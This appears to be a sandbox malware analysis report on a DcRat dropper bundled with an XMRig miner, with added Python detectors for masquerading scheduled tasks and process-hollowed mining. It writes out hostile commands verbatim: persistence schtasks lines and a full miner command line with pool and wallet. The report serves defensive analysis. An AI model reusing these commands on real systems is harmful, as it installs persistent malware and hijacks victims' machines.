Analysis
max time kernel: 135s
max time network: 153s
platform: windows10_x64
resource: win10v20210410
submitted: 22-07-2021 22:46
Static task: static1
Behavioral task: behavioral1
Sample: Software v3.0.5.exe
Resource: win7v20210410
General
Target: Software v3.0.5.exe
Size: 910KB
MD5: 56d73f0b8c89094a9f0ad6277f042b3d
SHA1: 6efe8b8257f030fdb63a069aad558b6282310a31
SHA256: c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
SHA512: 6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
DcRat
DarkCrystal RAT (DCRat) is a .NET remote access trojan, active since June 2019, that can load additional plugins.
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe | dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe | dcrat
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe | dcrat
XMRig Miner Payload 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/964-222-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral2/memory/964-223-0x00000001402EB66C-mapping.dmp | xmrig
behavioral2/memory/964-227-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
Executes dropped EXE 11 IoCs
Processes:
pid | process
3064 | Dcr.exe
3588 | etc.exe
2844 | xmr.exe
2208 | fonthostSvcIntodhcp.exe
4044 | fonthostSvcIntodhcp.exe
3960 | fonthostSvcIntodhcp.exe
2412 | ShellExperienceHost.exe
2888 | services64.exe
3960 | services32.exe
1524 | sihost64.exe
2836 | sihost32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers commonly read stored browser data, which can include saved credentials.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
15 | ipinfo.io
16 | ipinfo.io
Drops file in System32 directory 18 IoCs
Processes:
description | ioc | process
File created | C:\Windows\System32\msdxm\dllhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\MapsCSP\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\wscproxystub\slui.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\msdxm\5940a34987c99120d96dace90a3f93f329dcad63 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\tpm\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\MapsCSP\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\dbgcore\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File opened for modification | C:\Windows\System32\dbgcore\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\puiapi\spoolsv.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\puiapi\f3b6ecef712a24f33798f5d2fb3790c3d9b894c4 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\wscproxystub\a29f4157103644af5692ebfddf35f6dff4e237da | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\blb_ps\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\tpm\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\wbem\mstsc\24dbde2999530ef5fd907494bc374d663924116c | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\blb_ps\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\dbgcore\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe | fonthostSvcIntodhcp.exe
File opened for modification | C:\Windows\System32\blb_ps\fontdrvhost.exe | fonthostSvcIntodhcp.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 2888 set thread context of 964 | 2888 | services64.exe | explorer.exe
Drops file in Program Files directory 2 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe | fonthostSvcIntodhcp.exe
Drops file in Windows directory 9 IoCs
Processes:
description | ioc | process
File created | C:\Windows\bfsvc\explorer.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\bfsvc\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\dab4d89cac03ec27dbe47b361df763dc3f848f6c | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\f8c8f1285d826bc63910aaf97db97186ba642b4f | fonthostSvcIntodhcp.exe
File created | C:\Windows\setupact\explorer.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\setupact\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\InfusedApps\Packages\Microsoft.MicrosoftOfficeHub_17.8010.5926.0_x64__8wekyb3d8bbwe\AppxMetadata\winlogon.exe | fonthostSvcIntodhcp.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). The sandbox flags this as likely ransomware behaviour, but that is a generic heuristic: nothing else in this report (a DcRat dropper plus an XMRig miner, and no file-encryption signatures) supports a ransomware reading.
-
Creates scheduled task(s) 1 TTPs 23 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
23 schtasks.exe instances, PIDs: 3304, 2412, 4012, 3204, 4044, 1540, 3984, 2428, 3204, 2288, 740, 2204, 64, 60, 2084, 8, 2888, 2660, 1968, 768, 2740, 1052, 2740
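All 23 schtasks command lines in the process tree below share one pattern: /sc ONLOGON /rl HIGHEST /f, a task name borrowed from a real Windows binary (fontdrvhost, dllhost, slui, explorer, WmiPrvSE, RuntimeBroker, ...), and a /tr path that is not where that binary lives (System32\blb_ps\fontdrvhost.exe, Windows\bfsvc\explorer.exe, PerfLogs\RuntimeBroker.exe, Documents and Settings\services.exe). The Python below is an added example written for this page, not part of the sandbox report or of the DcRat/XMRig tooling: it parses such command lines and raises a finding for each of the three patterns. The install directories in EXPECTED_DIRS are an assumption for a default Windows 10 x64 layout, and the sample command lines are copied from this report.

```python
import re
from pathlib import PureWindowsPath

# Sample input: schtasks command lines transcribed from this report's process tree.
SAMPLE_CMDLINES = [
    r'''"schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\blb_ps\fontdrvhost.exe'" /rl HIGHEST /f''',
    r'''"schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f''',
    r'''"schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\bfsvc\explorer.exe'" /rl HIGHEST /f''',
    r'''"schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe'" /rl HIGHEST /f''',
    r'''"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\PerfLogs\RuntimeBroker.exe'" /rl HIGHEST /f''',
    r'''"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit''',
]

# Assumption: where each impersonated binary lives on a default Windows 10 x64 install
# (lower-case, no trailing backslash). Anything else is a masquerade.
EXPECTED_DIRS = {
    "fontdrvhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dllhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "slui.exe": {r"c:\windows\system32"},
    "explorer.exe": {r"c:\windows"},
    "services.exe": {r"c:\windows\system32"},
    "spoolsv.exe": {r"c:\windows\system32"},
    "wmiprvse.exe": {r"c:\windows\system32\wbem", r"c:\windows\syswow64\wbem"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "sppextcomobj.exe": {r"c:\windows\system32"},
    "searchui.exe": {r"c:\windows\systemapps\microsoft.windows.cortana_cw5n1h2txyewy"},
    "shellexperiencehost.exe": {r"c:\windows\systemapps\shellexperiencehost_cw5n1h2txyewy"},
}
# Top-level directories under which a scheduled-task target is not automatically suspicious.
SYSTEM_ROOTS = {"windows", "program files", "program files (x86)"}

# /tn, /sc, /rl and /tr followed by a double-quoted, single-quoted or bare token.
OPT = re.compile(r'''/(tn|sc|rl|tr)\s+("[^"]*"|'[^']*'|\S+)''', re.IGNORECASE)


def parse_schtasks(cmdline):
    """Return the /tn /sc /rl /tr values with the quoting layers stripped."""
    return {k.lower(): v.strip('"\'') for k, v in OPT.findall(cmdline)}


def triage_task(cmdline):
    """Parse one schtasks /create command line and list the suspicious traits it shows."""
    opts = parse_schtasks(cmdline)
    findings = []
    if opts.get("sc", "").upper() == "ONLOGON" and opts.get("rl", "").upper() == "HIGHEST":
        findings.append("onlogon-highest")  # elevated re-execution at every logon
    target = opts.get("tr", "")
    if target:
        path = PureWindowsPath(target)
        name, parent = path.name.lower(), str(path.parent).lower()
        expected = EXPECTED_DIRS.get(name)
        if expected is not None and parent not in expected:
            findings.append(f"masquerade:{name}")  # system binary name, wrong directory
        top = path.parts[1].lower() if len(path.parts) > 1 else ""
        if top not in SYSTEM_ROOTS:
            findings.append("outside-system-dirs")  # AppData, PerfLogs, C:\Boot, C:\Recovery ...
    return {"name": opts.get("tn", ""), "target": target, "findings": findings}


def flagged_tasks(cmdlines=SAMPLE_CMDLINES):
    """Triage results for every command line that raised at least one finding."""
    return [r for r in (triage_task(c) for c in cmdlines) if r["findings"]]


if __name__ == "__main__":
    for r in flagged_tasks():
        print(f'{r["name"]:<14} {", ".join(r["findings"]):<55} {r["target"]}')
```

The same parser works on the `Scheduled Task Created` (4698) event's command line or on the `/tr` value read back from `schtasks /query /xml`; the masquerade check is the one that survives renaming, because the actor has to keep the lure name for the task to look legitimate in Task Scheduler.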
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | Dcr.exe
Suspicious behavior: EnumeratesProcesses 27 IoCs
Processes:
pid | process | count
2208 | fonthostSvcIntodhcp.exe | 3
4044 | fonthostSvcIntodhcp.exe | 15
3960 | fonthostSvcIntodhcp.exe | 3
2412 | ShellExperienceHost.exe | 2
3588 | etc.exe | 1
2844 | xmr.exe | 1
3960 | services32.exe | 1
2888 | services64.exe | 1
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
2412 | ShellExperienceHost.exe
Suspicious use of AdjustPrivilegeToken 10 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2208 | fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege | 4044 | fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege | 3960 | fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege | 2412 | ShellExperienceHost.exe
Token: SeDebugPrivilege | 3588 | etc.exe
Token: SeDebugPrivilege | 2844 | xmr.exe
Token: SeDebugPrivilege | 3960 | services32.exe
Token: SeDebugPrivilege | 2888 | services64.exe
Token: SeLockMemoryPrivilege | 964 | explorer.exe
Token: SeLockMemoryPrivilege | 964 | explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
source pid/process | target pid/process | count
740 Software v3.0.5.exe | 3064 Dcr.exe | 3
740 Software v3.0.5.exe | 3588 etc.exe | 2
740 Software v3.0.5.exe | 2844 xmr.exe | 2
3064 Dcr.exe | 3964 WScript.exe | 3
3964 WScript.exe | 1524 cmd.exe | 3
1524 cmd.exe | 2208 fonthostSvcIntodhcp.exe | 2
2208 fonthostSvcIntodhcp.exe | 768 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 3984 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 60 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 2740 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 2084 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 8 schtasks.exe | 2
2208 fonthostSvcIntodhcp.exe | 4044 fonthostSvcIntodhcp.exe | 2
4044 fonthostSvcIntodhcp.exe | 3304 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 2428 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 2412 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 2888 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 3204 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 2288 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 1052 schtasks.exe | 2
4044 fonthostSvcIntodhcp.exe | 3960 fonthostSvcIntodhcp.exe | 2
3960 fonthostSvcIntodhcp.exe | 4012 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 2660 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 740 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 2740 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 2204 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 1968 schtasks.exe | 2
3960 fonthostSvcIntodhcp.exe | 2412 ShellExperienceHost.exe | 2
3588 etc.exe | 2392 cmd.exe | 2
2844 xmr.exe | 2420 cmd.exe | 2
2420 cmd.exe | 3204 schtasks.exe | 1
Processes
[1] C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Roaming\Dcr.exe
      cmdline: C:\Users\Admin\AppData\Roaming\Dcr.exe
      - Executes dropped EXE
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\SysWOW64\WScript.exe
        cmdline: "C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe
          cmdline: C:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
          - Suspicious use of WriteProcessMemory
        [5] C:\fonthostSvc\fonthostSvcIntodhcp.exe
            cmdline: "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
            - Executes dropped EXE
            - Drops file in System32 directory
            - Drops file in Windows directory
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\blb_ps\fontdrvhost.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Documents and Settings\services.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\Windows\System32\wscproxystub\slui.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\bfsvc\explorer.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\PlacesAutoSuggestProxyStub\SearchUI.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\Windows\SYSTEM32\schtasks.exe
              cmdline: "schtasks" /create /tn "slui" /sc ONLOGON /tr "'C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\slui.exe'" /rl HIGHEST /f
              - Creates scheduled task(s)
          [6] C:\fonthostSvc\fonthostSvcIntodhcp.exe
              cmdline: "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
              - Executes dropped EXE
              - Drops file in System32 directory
              - Drops file in Program Files directory
              - Drops file in Windows directory
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "services" /sc ONLOGON /tr "'C:\Boot\cs-CZ\services.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\setupact\explorer.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SppExtComObj.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\msdxm\dllhost.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\tpm\fontdrvhost.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\MapsCSP\fontdrvhost.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\Windows\SYSTEM32\schtasks.exe
                cmdline: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\SubsetList\fontdrvhost.exe'" /rl HIGHEST /f
                - Creates scheduled task(s)
            [7] C:\fonthostSvc\fonthostSvcIntodhcp.exe
                cmdline: "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
                - Executes dropped EXE
                - Drops file in System32 directory
                - Drops file in Windows directory
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of WriteProcessMemory
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\dbgcore\fontdrvhost.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "fonthostSvcIntodhcp" /sc ONLOGON /tr "'C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D\fonthostSvcIntodhcp.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Windows\System32\puiapi\spoolsv.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\System32\wbem\mstsc\WmiPrvSE.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SYSTEM32\schtasks.exe
                  cmdline: "schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\PerfLogs\RuntimeBroker.exe'" /rl HIGHEST /f
                  - Creates scheduled task(s)
              [8] C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe
                  cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxManifest\ShellExperienceHost.exe"
                  - Executes dropped EXE
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious behavior: GetForegroundWindowSpam
                  - Suspicious use of AdjustPrivilegeToken
  [2] C:\Users\Admin\AppData\Roaming\etc.exe
      cmdline: C:\Users\Admin\AppData\Roaming\etc.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
      [4] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
          - Creates scheduled task(s)
    [3] C:\Users\Admin\AppData\Roaming\services32.exe
        cmdline: "C:\Users\Admin\AppData\Roaming\services32.exe"
        - Executes dropped EXE
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
        [5] C:\Windows\system32\schtasks.exe
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
            - Creates scheduled task(s)
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
          cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
          - Executes dropped EXE
  [2] C:\Users\Admin\AppData\Roaming\xmr.exe
      cmdline: C:\Users\Admin\AppData\Roaming\xmr.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\cmd.exe
        cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\schtasks.exe
          cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          - Creates scheduled task(s)
    [3] C:\Users\Admin\AppData\Roaming\services64.exe
        cmdline: "C:\Users\Admin\AppData\Roaming\services64.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        [5] C:\Windows\system32\schtasks.exe
            cmdline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
            - Creates scheduled task(s)
      [4] C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
          cmdline: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
          - Executes dropped EXE
      [4] C:\Windows\explorer.exe
          cmdline: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
          - Suspicious use of AdjustPrivilegeToken
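Three separate rows of this report describe one event. services64.exe (PID 2888) sets the thread context of explorer.exe (PID 964); explorer.exe then carries an XMRig command line (--algo=rx/0, --url=pool.hashvault.pro:80, a Monero wallet in --user, --cinit-stealth) that the real shell never accepts; and PID 964 enables SeLockMemoryPrivilege, which XMRig requests for RandomX large pages. The Python below is an added example, not part of the sandbox report or of any tool it names: it correlates those rows over process and event records constructed from this page. The list of Windows binaries that never take GNU-style options, and the set of miner-only option names, are assumptions made for the example; the --cinit-* options are not in stock XMRig and mark a customised build.

```python
import re
from pathlib import PureWindowsPath

# Constructed from this report's process tree and the SetThreadContext /
# AdjustPrivilegeToken signature sections (not real EDR telemetry).
PROCESSES = [
    {"pid": 2844, "ppid": 740, "image": r"C:\Users\Admin\AppData\Roaming\xmr.exe",
     "cmdline": r"C:\Users\Admin\AppData\Roaming\xmr.exe"},
    {"pid": 2888, "ppid": 2844, "image": r"C:\Users\Admin\AppData\Roaming\services64.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Roaming\services64.exe"'},
    {"pid": 964, "ppid": 2888, "image": r"C:\Windows\explorer.exe",
     "cmdline": (r"C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto "
                 r"--cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr "
                 r"--cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 "
                 r"--user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ "
                 r"--pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth")},
]
EVENTS = [
    {"type": "SetThreadContext", "pid": 2888, "target": 964},
    {"type": "AdjustPrivilegeToken", "pid": 964, "privilege": "SeLockMemoryPrivilege"},
    {"type": "AdjustPrivilegeToken", "pid": 2888, "privilege": "SeDebugPrivilege"},
]

# Assumption: these Windows binaries take no "--option" arguments, so any such
# argument on their command line means the mapped image is not what the path says.
NO_DASH_DASH = {"explorer.exe", "svchost.exe", "dllhost.exe", "runtimebroker.exe"}
# Assumption: option names that only a miner command line carries.
MINER_OPTS = {"url", "algo", "user", "cinit-stealth", "cpu-max-threads-hint", "randomx-mode"}
OPT = re.compile(r"--([a-z0-9-]+)(?:=(\S*))?")


def parse_miner_args(cmdline):
    """Return the --name[=value] options of an XMRig-style command line as a dict (value '' when absent)."""
    return {k: v for k, v in OPT.findall(cmdline)}


def pool_endpoint(args):
    """Split --url into (host, port); (None, None) when the command line has no --url."""
    url = args.get("url")
    if not url:
        return None, None
    host, sep, port = url.rpartition(":")
    if not sep:
        return url, None
    return host, int(port) if port.isdigit() else None


def score_process(proc, events):
    """Findings for one process record, combining its command line with the event stream."""
    findings = []
    image = PureWindowsPath(proc["image"]).name.lower()
    args = parse_miner_args(proc["cmdline"])
    if len(MINER_OPTS.intersection(args)) >= 3:
        findings.append("xmrig-cmdline")            # pool URL, algorithm and wallet on the command line
    if image in NO_DASH_DASH and args:
        findings.append("cmdline-image-mismatch")   # explorer.exe with --options: image replaced in memory
    for ev in events:
        if ev["type"] == "SetThreadContext" and ev["target"] == proc["pid"] and ev["pid"] != proc["pid"]:
            findings.append(f"thread-context-set-by:{ev['pid']}")    # the hollowing step
        if ev["type"] == "SetThreadContext" and ev["pid"] == proc["pid"]:
            findings.append(f"sets-thread-context-of:{ev['target']}")  # the injector side
        if (ev["type"] == "AdjustPrivilegeToken" and ev["pid"] == proc["pid"]
                and ev["privilege"] == "SeLockMemoryPrivilege"):
            findings.append("large-pages-privilege")  # XMRig asks for this to use RandomX large pages
    return findings


def hunt(processes=PROCESSES, events=EVENTS):
    """{pid: findings} for every process that raised at least one finding."""
    out = {}
    for p in processes:
        f = score_process(p, events)
        if f:
            out[p["pid"]] = f
    return out


if __name__ == "__main__":
    for pid, findings in hunt().items():
        print(pid, ", ".join(findings))
    print("pool:", pool_endpoint(parse_miner_args(PROCESSES[2]["cmdline"])))
```

The command-line/image mismatch is the cheapest of the three checks and does not depend on the injector being caught: it fires on a plain process-creation log, while the SetThreadContext and SeLockMemoryPrivilege rows need API-level telemetry. Blocking pool.hashvault.pro on port 80 at the egress is the containment step the parsed endpoint gives you.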
Downloads
-
